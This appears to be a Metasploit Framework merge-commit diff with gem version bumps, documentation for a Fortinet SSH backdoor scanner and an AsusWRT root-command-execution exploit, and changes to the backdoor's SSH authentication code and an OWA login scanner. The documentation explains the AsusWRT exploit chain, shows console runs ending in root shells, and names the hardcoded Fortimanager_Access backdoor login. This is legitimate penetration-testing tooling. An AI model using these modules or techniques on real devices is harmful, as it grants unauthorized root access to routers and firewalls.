Merge branch 'rapid7/master' into goliath

Author: jbarnett-r7

Gemfile.lock

@@ -59,7 +59,7 @@ PATH
       rex-text
       rex-zip
       ruby-macho
-      ruby_smb
+      ruby_smb (= 0.0.18)
       rubyntlm
       rubyzip
       sqlite3
@@ -127,11 +127,11 @@ GEM
       railties (>= 3.0.0)
     faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.13.1)
+    faraday (0.14.0)
       multipart-post (>= 1.2, < 3)
     filesize (0.1.1)
     fivemat (1.3.5)
-    google-protobuf (3.5.1)
+    google-protobuf (3.5.1.2)
     googleapis-common-protos-types (1.0.1)
       google-protobuf (~> 3.0)
     googleauth (0.6.2)
@@ -142,12 +142,12 @@ GEM
       multi_json (~> 1.11)
       os (~> 0.9)
       signet (~> 0.7)
-    grpc (1.8.3)
+    grpc (1.9.1)
       google-protobuf (~> 3.1)
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
     hashery (2.1.2)
-    i18n (0.9.1)
+    i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
@@ -157,7 +157,7 @@ GEM
     logging (2.2.2)
       little-plugger (~> 1.1)
       multi_json (~> 1.10)
-    loofah (2.1.1)
+    loofah (2.2.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     memoist (0.16.0)
@@ -169,7 +169,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.12)
+    metasploit-credential (2.0.13)
       metasploit-concern
       metasploit-model
       metasploit_data_models
@@ -196,7 +196,7 @@ GEM
     metasploit_payloads-mettle (0.3.7)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
-    minitest (5.11.1)
+    minitest (5.11.3)
     mqtt (0.5.0)
     msgpack (1.2.2)
     multi_json (1.13.1)
@@ -205,7 +205,7 @@ GEM
     net-ssh (4.2.0)
     network_interface (0.0.2)
     nexpose (7.2.0)
-    nokogiri (1.8.1)
+    nokogiri (1.8.2)
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
@@ -216,7 +216,7 @@ GEM
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.12.4)
-    pdf-reader (2.0.0)
+    pdf-reader (2.1.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -231,7 +231,7 @@ GEM
     pry (0.11.3)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.0.1)
+    public_suffix (3.0.2)
     rack (1.6.8)
     rack-protection (1.5.3)
       rack
@@ -324,7 +324,7 @@ GEM
       rspec-support (~> 3.7.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.7.0)
+    rspec-support (3.7.1)
     ruby-macho (1.1.0)
     ruby-rc4 (0.1.5)
     ruby_smb (0.0.18)
@@ -361,7 +361,7 @@ GEM
     tilt (2.0.7)
     timecop (0.9.1)
     ttfunk (1.5.1)
-    tzinfo (1.2.4)
+    tzinfo (1.2.5)
       thread_safe (~> 0.1)
     tzinfo-data (1.2018.3)
       tzinfo (>= 1.0.0)

documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md

@@ -0,0 +1,63 @@
+## Intro
+
+This module scans for the Fortinet SSH backdoor and creates sessions.
+
+## Setup
+
+1. `git clone https://github.com/nixawk/labs`
+2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
+3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
+
+## Usage
+
+```
+msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
+rhosts => 192.168.212.0/24
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
+threads => 100
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
+
+[*] Scanned  54 of 256 hosts (21% complete)
+[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
+[*] Scanned  65 of 256 hosts (25% complete)
+[*] Scanned  78 of 256 hosts (30% complete)
+[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
+[*] Scanned 104 of 256 hosts (40% complete)
+[*] Scanned 141 of 256 hosts (55% complete)
+[*] Scanned 154 of 256 hosts (60% complete)
+[*] Scanned 180 of 256 hosts (70% complete)
+[*] Scanned 205 of 256 hosts (80% complete)
+[*] Scanned 240 of 256 hosts (93% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
+[*] Starting interaction with 1...
+
+FortiGate-VM # get system status
+Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
+Virus-DB: 16.00560(2012-10-19 08:31)
+Extended DB: 1.00000(2012-10-17 15:46)
+Extreme DB: 1.00000(2012-10-17 15:47)
+IPS-DB: 4.00345(2013-05-23 00:39)
+IPS-ETDB: 0.00000(2000-00-00 00:00)
+Serial-Number: FGVM00UNLICENSED
+Botnet DB: 1.00000(2012-05-28 22:51)
+License Status: Evaluation license expired
+Evaluation License Expires: Thu Jan 28 13:05:41 2016
+BIOS version: 04000002
+Log hard disk: Need format
+Hostname: FortiGate-VM
+Operation Mode: NAT
+Current virtual domain: root
+Max number of virtual domains: 10
+Virtual domains status: 1 in NAT mode, 0 in TP mode
+Virtual domain configuration: disable
+FIPS-CC mode: disable
+Current HA mode: standalone
+Branch point: 228
+Release Version Information: GA Patch 4
+System time: Wed Feb 21 13:13:43 2018
+
+FortiGate-VM #
+```

documentation/modules/exploit/linux/http/asuswrt_lan_rce.md

@@ -0,0 +1,70 @@
+## Description
+
+  This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.
+
+
+## Vulnerable Application
+
+  The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode.
+
+  This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.
+
+  This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.
+
+  Numerous ASUS models are reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploits/linux/http/asuswrt_lan_rce`
+  3. `set RHOST [IP]`
+  4. `run`
+  5. You should get a *root* session
+
+
+## Options
+
+  **ASUSWRTPORT**
+
+  AsusWRT HTTP portal port (default: `80`)
+
+
+## Scenarios
+msf > use exploit/linux/http/asuswrt_lan_rce
+msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
+rhost => 192.168.132.205
+msf exploit(linux/http/asuswrt_lan_rce) > run
+
+[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
+[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
+[+] 192.168.132.205:9999 - Success, shell incoming!
+[*] Found shell.
+[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600
+
+id
+id
+/bin/sh: id: not found
+/ # cat /proc/cpuinfo
+cat /proc/cpuinfo
+system type             : Broadcom BCM53572 chip rev 1 pkg 8
+processor               : 0
+cpu model               : MIPS 74K V4.9
+BogoMIPS                : 149.91
+wait instruction        : no
+microsecond timers      : yes
+tlb_entries             : 32
+extra interrupt vector  : no
+hardware watchpoint     : yes
+ASEs implemented        : mips16 dsp
+shadow register sets    : 1
+VCED exceptions         : not available
+VCEI exceptions         : not available
+
+unaligned_instructions  : 0
+dcache hits             : 2147483648
+dcache misses           : 0
+icache hits             : 2147483648
+icache misses           : 0
+instructions            : 2147483648
+/ #

lib/msf/core/exploit/fortinet.rb

@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 
+# https://www.ietf.org/rfc/rfc4252.txt
 # https://www.ietf.org/rfc/rfc4256.txt
 
 require 'net/ssh'
@@ -11,21 +12,21 @@ class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentica
     USERAUTH_INFO_RESPONSE = 61
 
     def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
-      debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
+      debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }
 
       send_message(userauth_request(
 =begin
-        string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
-        string    service name (US-ASCII)
-        string    "keyboard-interactive" (US-ASCII)
-        string    language tag (as defined in [RFC-3066])
-        string    submethods (ISO-10646 UTF-8)
+        string    user name
+        string    service name
+        string    "password"
+        boolean   FALSE
+        string    plaintext password in ISO-10646 UTF-8 encoding [RFC3629]
 =end
         username,
         service_name,
-        'keyboard-interactive',
-        '',
-        ''
+        'password',
+        false,
+        password || ''
       ))
 
       loop do
@@ -37,7 +38,22 @@ def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
           return true
         when USERAUTH_FAILURE
           debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
-          return false
+          debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
+
+          send_message(userauth_request(
+=begin
+            string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
+            string    service name (US-ASCII)
+            string    "keyboard-interactive" (US-ASCII)
+            string    language tag (as defined in [RFC-3066])
+            string    submethods (ISO-10646 UTF-8)
+=end
+            username,
+            service_name,
+            'keyboard-interactive',
+            '',
+            ''
+          ))
         when USERAUTH_INFO_REQUEST
           debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
 

lib/msf/core/modules/external/python/metasploit/module.py

@@ -29,7 +29,7 @@ def report_vuln(ip, name, **opts):
 
 
 def run(metadata, module_callback):
-    req = json.loads(os.read(0, 10000))
+    req = json.loads(os.read(0, 10000).decode("utf-8"))
     if req['method'] == 'describe':
         rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})
     elif req['method'] == 'run':

metasploit-framework.gemspec

@@ -127,7 +127,7 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'mqtt'
   spec.add_runtime_dependency 'net-ssh'
   spec.add_runtime_dependency 'bcrypt_pbkdf'
-  spec.add_runtime_dependency 'ruby_smb'
+  spec.add_runtime_dependency 'ruby_smb', '0.0.18'
 
   #
   # REX Libraries

modules/auxiliary/scanner/http/owa_login.rb

@@ -232,7 +232,7 @@ def try_user_pass(opts)
       # No password change required moving on.
       # Check for valid login but no mailbox setup
       print_good("server type: #{res.headers["X-FEServer"]}")
-      if res.headers['location'] =~ /owa/
+      if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/
         print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'")
         report_cred(
           ip: res.peerinfo['addr'],